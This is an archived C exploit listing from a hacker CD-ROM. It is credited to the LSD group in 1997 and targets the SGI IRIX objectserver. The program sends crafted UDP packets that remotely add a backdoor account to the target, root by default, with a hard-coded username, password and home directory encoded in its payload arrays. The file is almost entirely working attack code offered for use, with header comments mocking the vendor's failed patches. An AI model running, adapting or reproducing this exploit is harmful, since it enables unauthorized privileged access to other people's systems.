home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / irix / irx_objectserver.c < prev    next >
Encoding:
C/C++ Source or Header  |  2002-10-22  |  9.2 KB  |  307 lines
  1. /*## copyright LAST STAGE OF DELIRIUM jul 1997 poland        *://lsd-pl.net/ #*/
  2. /*## objectserver                                                            #*/
  3.  
  4. /*   SGI objectserver "account" exploit                                       */
  5. /*   Remotely adds account to the IRIX system.                                */
  6. /*   Which was supposed to be free from this bug (SGI 19960101-01-PX).        */
  7. /*   The vulnerability "was corrected" on 6.2 systems but                     */
  8. /*   SGI guys fucked up the job and it still can be exploited.                */
  9. /*   The same considers patched 5.x,6.0.1 and 6.1 systems                     */
  10. /*   where SGI released patches DONT work.                                    */
  11. /*   The only difference is that root account creation is blocked.            */
  12. /*                                                                            */
  13. /*   usage: ob_account address [-u username] [-i userid] [-p]                 */
  14. /*       -i  specify userid (other than 0)                                    */
  15. /*       -u  change the default added username                                */
  16. /*       -p  probe if there's the objectserver running                        */
  17. /*                                                                            */
  18. /*   default account added       : lsd                                        */
  19. /*   default password            : m4c10r4!                                   */
  20. /*   default user home directory : /tmp/.new                                  */
  21. /*   default userid              : root                                       */
  22.  
  23. #include <sys/types.h>
  24. #include <sys/socket.h>
  25. #include <netinet/in.h>
  26. #include <arpa/inet.h>
  27. #include <netdb.h>
  28. #include <sys/uio.h>
  29. #include <errno.h>
  30. #include <stdio.h>
  31. #define E if(errno) perror("");
  32.  
  33. struct iovec iov[2];
  34. struct msghdr msg;
  35. char buf1[1024],buf2[1024];
  36. int sck;
  37. unsigned long adr;
  38.  
  39. void show_msg(){
  40.     char *p,*p1;
  41.     int i,j,c,d;
  42.  
  43.     c=0;
  44.     printf("%04x   ",iov[0].iov_len);
  45.     p=(char*)iov[0].iov_base;
  46.     for(i=0;i<iov[0].iov_len;i++){
  47.         c++;
  48.         if(c==17){
  49.              printf("    ");
  50.              p1=p;p1=p1-16;
  51.              for(j=0;j<16;j++){
  52.                  if(isprint(*p1)) printf("%c",*p1);
  53.                  else printf(".");
  54.                  p1++;
  55.              }
  56.              c=1;
  57.              printf("\n       ");
  58.         }
  59.         printf("%02x ",(unsigned char)*p++);
  60.     }
  61.     printf("    ");
  62.     p1=p;p1=p1-c;
  63.     if(c>1){
  64.         for(i=0;i<(16-c);i++) printf("   ");
  65.         for(i=0;i<c;i++){
  66.             if(isprint(*p1)) printf("%c",*p1);
  67.             else printf(".");
  68.             p1++;
  69.         }
  70.     }
  71.     printf("\n");
  72.     if(msg.msg_iovlen!=2) return;
  73.  
  74.     c=0;
  75.     p=(char*)iov[0].iov_base;
  76.     d=p[0x0a]*0x100+p[0x0b];
  77.     p=(char*)iov[1].iov_base;
  78.     printf("%04x   ",d);
  79.     for(i=0;i<d;i++){
  80.         c++;
  81.         if(c==17){
  82.              printf("    ");
  83.              p1=p;p1=p1-16;
  84.              for(j=0;j<16;j++){
  85.                  if(isprint(*p1)) printf("%c",*p1);
  86.                  else printf(".");
  87.                  p1++;
  88.              }
  89.              c=1;
  90.              printf("\n       ");
  91.         }
  92.         printf("%02x ",(unsigned char)*p++);
  93.     }
  94.     printf("    ");
  95.     p1=p;p1=p1-c;
  96.     if(c>1){
  97.         for(i=0;i<(16-c);i++) printf("   ");
  98.         for(i=0;i<c;i++){
  99.             if(isprint(*p1)) printf("%c",*p1);
  100.             else printf(".");
  101.             p1++;
  102.         }
  103.     }
  104.     printf("\n");
  105.     fflush(stdout);
  106. }
  107.  
  108. char numer_one[0x10]={
  109.     0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
  110.     0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x00
  111. };
  112.  
  113. char numer_two[0x24]={
  114.     0x21,0x03,0x00,0x43,0x00,0x0a,0x00,0x0a,
  115.     0x01,0x01,0x3b,0x01,0x6e,0x00,0x00,0x80,
  116.     0x43,0x01,0x01,0x18,0x0b,0x01,0x01,0x3b,
  117.     0x01,0x6e,0x01,0x02,0x01,0x03,0x00,0x01,
  118.     0x01,0x07,0x01,0x01
  119. };
  120.  
  121. char dodaj_one[0x10]={
  122.     0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
  123.     0x00,0x00,0x01,0x2a,0x00,0x00,0x00,0x00
  124. };
  125.  
  126. char dodaj_two[1024]={
  127.     0x1c,0x03,0x00,0x43,0x02,0x01,0x1d,0x0a,
  128.     0x01,0x01,0x3b,0x01,0x78
  129. };
  130.  
  131. char dodaj_three[27]={
  132.     0x01,0x02,0x0a,0x01,0x01,0x3b,
  133.     0x01,0x78,0x00,0x00,0x80,0x43,0x01,0x10,
  134.     0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
  135.     0x01,0x01,0x09,0x43,0x01
  136. };
  137.  
  138. char dodaj_four[200]={
  139.     0x17,0x0b,0x01,0x01,0x3b,0x01,0x02,
  140.     0x01,0x01,0x01,0x09,0x43,0x01,0x03,0x4c,
  141.     0x73,0x44,0x17,0x0b,0x01,0x01,0x3b,0x01,
  142.     0x6e,0x01,0x06,0x01,0x09,0x43,0x00,0x17,
  143.     0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,0x07,
  144.     0x01,0x09,0x43,0x00,0x17,0x0b,0x01,0x01,
  145.     0x3b,0x01,0x02,0x01,0x03,0x01,0x09,0x43,
  146.     0x00,0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,
  147.     0x01,0x09,0x01,0x09,0x43,0x00,0x17,0x0b,
  148.     0x01,0x01,0x3b,0x01,0x6e,0x01,0x0d,0x01,
  149.     0x09,0x43,0x00,0x17,0x0b,0x01,0x01,0x3b,
  150.     0x01,0x6e,0x01,0x10,0x01,0x09,0x43,0x00,
  151.     0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
  152.     0x0a,0x01,0x09,0x43,0x00,0x17,0x0b,0x01,
  153.     0x01,0x3b,0x01,0x6e,0x01,0x0e,0x01,0x03,
  154.     0x01,0x09,0x17,0x0b,0x01,0x01,0x3b,0x01,
  155.     0x6e,0x01,0x04,0x01,0x09,0x43,0x01,0x0d,
  156.     0x61,0x6b,0x46,0x4a,0x64,0x78,0x65,0x6e,
  157.     0x4b,0x6e,0x79,0x53,0x2e,0x17,0x0b,0x01,
  158.     0x01,0x3b,0x01,0x6e,0x01,0x11,0x01,0x09,
  159.     0x43,0x01,0x09,0x2f,0x74,0x6d,0x70,0x2f,
  160.     0x2e,0x6e,0x65,0x77,0x17,0x0b,0x01,0x01,
  161.     0x3b,0x01,0x6e,0x01,0x12,0x01,0x09,0x43,
  162.     0x01,0x04,0x72,0x6f,0x6f,0x74,0x17,0x0b,  
  163.     0x01,0x01,0x3b,0x01,0x6e,0x01,0x02,0x01,
  164.     0x03
  165. };
  166.  
  167. char dodaj_five[39]={
  168.     0x17,0x0b,0x01,0x01,0x3b,0x01,
  169.     0x6e,0x01,0x13,0x01,0x09,0x43,0x01,0x08,
  170.     0x2f,0x62,0x69,0x6e,0x2f,0x63,0x73,0x68,
  171.     0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
  172.     0x0f,0x01,0x09,0x43,0x01,0x03,'L','S','D'
  173. };
  174.  
  175. char fake_adrs[0x10]={
  176.     0x00,0x02,0x14,0x0f,0xff,0xff,0xff,0xff,
  177.     0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  178. };
  179.  
  180. char *get_sysinfo(){
  181.     int i=0,j,len;
  182.  
  183.     iov[0].iov_base=numer_one;
  184.     iov[0].iov_len=0x10;
  185.     iov[1].iov_base=numer_two;
  186.     iov[1].iov_len=0x24;
  187.     msg.msg_name=(caddr_t)fake_adrs;
  188.     msg.msg_namelen=0x10;
  189.     msg.msg_iov=iov;
  190.     msg.msg_iovlen=2;
  191.     msg.msg_accrights=(caddr_t)0;
  192.     msg.msg_accrightslen=0;
  193.     printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
  194.     printf("\n");
  195.  
  196.     iov[0].iov_base=buf1;
  197.     iov[1].iov_base=buf2;
  198.     iov[1].iov_len=0x200;
  199.     msg.msg_iovlen=2;
  200.     printf("RM:  --[0x%04x bytes]--\n",len=recvmsg(sck,&msg,0)); show_msg();
  201.     printf("\n");
  202.     while(i<len-0x16) 
  203.         if(!memcmp("\x0a\x01\x01\x3b\x01\x78",&buf2[i],6)){
  204.             printf("remote system ID: ");
  205.             for(j=0;j<buf2[i+6];j++) printf("%02x ",buf2[i+7+j]);
  206.             printf("\n"); 
  207.             return(&buf2[i+6]);
  208.         }else i++;
  209.     return(0);
  210. }
  211.  
  212. void new_account(int len){
  213.     iov[0].iov_base=dodaj_one;
  214.     iov[0].iov_len=0x10;
  215.     iov[1].iov_base=dodaj_two;
  216.     iov[1].iov_len=len;
  217.     msg.msg_name=(caddr_t)fake_adrs;
  218.     msg.msg_namelen=0x10;
  219.     msg.msg_iov=iov;
  220.     msg.msg_iovlen=2;
  221.     msg.msg_accrights=(caddr_t)0;
  222.     msg.msg_accrightslen=0;
  223.     printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
  224.     printf("\n");
  225.  
  226.     iov[0].iov_base=buf1;
  227.     iov[1].iov_base=buf2;
  228.     iov[1].iov_len=0x200;
  229.     msg.msg_iovlen=2;
  230.     printf("RM:  --[0x%04x bytes]--\n",recvmsg(sck,&msg,0)); show_msg();
  231.     printf("\n");
  232. }
  233.  
  234. void info(char *text){
  235.     printf("usage: %s address [-u username] [-v userid] [-p]\n",text);
  236. }
  237.  
  238. main(int argc,char **argv){
  239.     int c,user,version,probe;
  240.     unsigned int offset,gr_offset,userid;
  241.     char *sys_info;
  242.     char username[20];
  243.     extern char *optarg;
  244.     extern int optind; 
  245.  
  246.     printf("copyright LAST STAGE OF DELIRIUM jul 1997 poland  //lsd-pl.net/\n");
  247.     printf("objectserver for irix 5.2 5.3 6.2 IP:all\n\n");
  248.  
  249.     if(argc<2) {info(argv[0]);exit(0);}
  250.     optind=2;
  251.     offset=40;
  252.     user=version=probe=0;
  253.     while((c=getopt(argc,argv,"u:i:p"))!=-1){
  254.         switch(c){
  255.         case 'u': strcpy(username,optarg);
  256.                   user=1;
  257.                   break;
  258.         case 'i': version=62;
  259.                   userid=atoi(optarg);
  260.                   break;
  261.         case 'p': probe=1;
  262.                   break;
  263.         case '?':
  264.         default : info(argv[0]); 
  265.                   exit(1);
  266.         }
  267.     }
  268.  
  269.     sck=socket(AF_INET,SOCK_DGRAM,0);
  270.     adr=inet_addr(argv[1]);
  271.     memcpy(&fake_adrs[4],&adr,4);
  272.  
  273.     if(!(sys_info=get_sysinfo())){
  274.         printf("error: can't get system ID for %s.\n",argv[1]);
  275.         exit(1);
  276.     }
  277.     if(!probe){
  278.         memcpy(&dodaj_two[0x0d],sys_info,sys_info[0]+1);
  279.         memcpy(&dodaj_two[0x0d+sys_info[0]+1],&dodaj_three[0],27);
  280.         offset+=sys_info[0]+1; 
  281.  
  282.         if(!user) strcpy(username,"lsd");
  283.         dodaj_two[offset++]=strlen(username);
  284.         strcpy(&dodaj_two[offset],username);offset+=strlen(username);
  285.         memcpy(&dodaj_two[offset],&dodaj_four[0],200);
  286.         offset+=200;
  287.         gr_offset=offset-15;
  288.         if(version){ 
  289.             dodaj_two[gr_offset++]='u'; 
  290.             dodaj_two[gr_offset++]='s'; 
  291.             dodaj_two[gr_offset++]='e'; 
  292.             dodaj_two[gr_offset++]='r'; 
  293.             dodaj_two[offset++]=0x02;
  294.             dodaj_two[offset++]=userid>>8;
  295.             dodaj_two[offset++]=userid&0xff; 
  296.         }
  297.         else dodaj_two[offset++]=0x00; 
  298.     
  299.         memcpy(&dodaj_two[offset],&dodaj_five[0],39);
  300.         offset+=39;
  301.         dodaj_one[10]=offset>>8;
  302.         dodaj_one[11]=offset&0xff;
  303.         new_account(offset);
  304.     }
  305. }
  306.  
  307.